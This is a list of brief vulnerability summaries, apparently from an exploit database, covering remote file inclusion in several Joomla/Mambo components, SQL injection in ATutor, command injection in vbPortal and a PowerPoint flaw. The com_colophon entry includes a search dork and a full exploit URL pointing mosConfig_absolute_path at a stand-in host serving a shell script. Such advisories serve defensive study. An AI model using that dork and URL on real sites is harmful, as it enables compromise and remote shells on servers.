The vulnerability exists due to insufficient sanitization of user-supplied input passed via the 'pathtohomedir' parameter to '/editprofile.php'. A remote attacker can include arbitrary files from remote hosts and execute arbitrary PHP code on the vulnerable system.
The LMO - Joomla! Component is vulnerable to an input validation vulnerability due to the lack of sanitization of the $mosConfig_absolute_path variable. An attacker can exploit this vulnerability by crafting a malicious URL and sending it to the victim. The malicious URL contains the $mosConfig_absolute_path variable set to a malicious host. When the victim visits the malicious URL, code from the malicious host will be executed.
Microsoft PowerPoint is prone to a remote code execution issue which may be triggered when a malformed PPT file is closed. Code execution is possible only if the number of characters in the PPT file name generated by this program plus the number of characters in the complete path name from which this PPT file is opened does not exceed 49 bytes, and the generated PPT file must be opened from the same directory in which it was created.
The com_bayesiannaivefilter Mambo component is vulnerable to a remote file inclusion vulnerability. This vulnerability is due to a failure in the application to properly sanitize user-supplied input to the 'mosConfig_absolute_path' parameter of the 'lang.php' script. An attacker can exploit this vulnerability to include arbitrary files from remote hosts and execute arbitrary code subject to the privileges of the webserver process. This can facilitate unauthorized access or privilege escalation.
A remote file inclusion vulnerability exists in the User Home Pages component of Raven Portal, which allows an attacker to include arbitrary files from remote locations. This vulnerability is due to a failure in the application to properly sanitize user-supplied input to the 'mosConfig_absolute_path' parameter of the 'uhp_config.php' script. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable application. Successful exploitation will result in arbitrary remote file execution.
ATutor version 1.5.3.1 and prior are vulnerable to a blind SQL injection vulnerability in the 'links' module. An attacker can exploit this vulnerability to disclose admin credentials.
This exploit allows an attacker to execute arbitrary commands on a vulnerable vbPortal 3.0.2 <= 3.6.0 Beta 1 system. The vulnerability is due to insufficient sanitization of user-supplied input to the 'vbblang' parameter in the 'index.php' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing shell metacharacters to the vulnerable system.
A remote include vulnerability exists in the Mambo Component mambatstaff. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing a malicious URL in the mosConfig_absolute_path parameter. This can allow the attacker to execute arbitrary code on the vulnerable system.
This bug allows a remote attacker to execute commands via Remote File Inclusion (RFI). The vulnerable page is admin.colophon.php, which contains a require_once statement that can be exploited by supplying a malicious URL in the mosConfig_absolute_path parameter. The dork for this vulnerability is inurl:com_colophon and the exploit URL is http://www.site.it/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://evalsite/shell.php?
Mambo Gallery Manager v095.r3 is vulnerable to a remote file inclusion vulnerability. This vulnerability is due to a failure in the application to properly sanitize user-supplied input to the 'mosConfig_absolute_path' parameter in the 'help.mgm.php' script. An attacker can exploit this vulnerability to include arbitrary files from remote hosts and execute arbitrary code on the vulnerable system.